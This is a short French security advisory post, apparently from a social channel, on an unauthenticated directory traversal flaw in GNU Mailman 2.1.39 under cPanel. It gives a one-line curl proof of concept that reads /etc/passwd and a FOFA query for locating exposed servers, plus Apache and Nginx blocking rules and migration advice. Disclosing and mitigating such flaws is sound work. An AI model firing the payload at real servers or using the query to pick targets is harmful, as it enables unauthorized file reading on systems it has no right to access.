
Une nouvelle vulnérabilité a été découverte dans GNU Mailman 2.1.39, fourni avec cPanel/WHM, permettant à des attaquants distants non authentifiés de lire des fichiers arbitraires sur le serveur via une faille de traversée de répertoire.
Une nouvelle vulnérabilité a été découverte dans GNU Mailman 2.1.39, fourni avec cPanel/WHM, permettant à des attaquants distants non authentifiés de lire des fichiers arbitraires sur le serveur via une faille de traversée de répertoire.
📌 Résumé de la vulnérabilité :
Directory Traversal (Non authentifié)private.py/mailman/private/mailman/etc/passwd, archives .mbox et configurations Mailman5.8 (Moyen)CVE-2025-43919Statut : Aucun patch officiel (Mailman 2.1.x est en fin de vie)
🔥 Preuve de concept :
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman
🧨 Scénarios d'exploitation :
/etc/passwd, configs ou fichiers mailbox🛡️ Atténuations :
Bloquer l'accès à /mailman/private au niveau du serveur web :
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
Ou dans Nginx :
location /mailman/private {
deny all;
return 403;
}
⬆️ Migrer vers Mailman 3.x — 2.x est en fin de vie et manque de protections modernes
🔍 Requête FOFA : app="Mailman"
📚 Apprenez-en plus, partagez de manière responsable et gardez votre infrastructure sécurisée.
🔒 Suivez pour plus de CVEs réelles, de PoCs et de conseils de durcissement : 👉 @cybersecplayground
#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity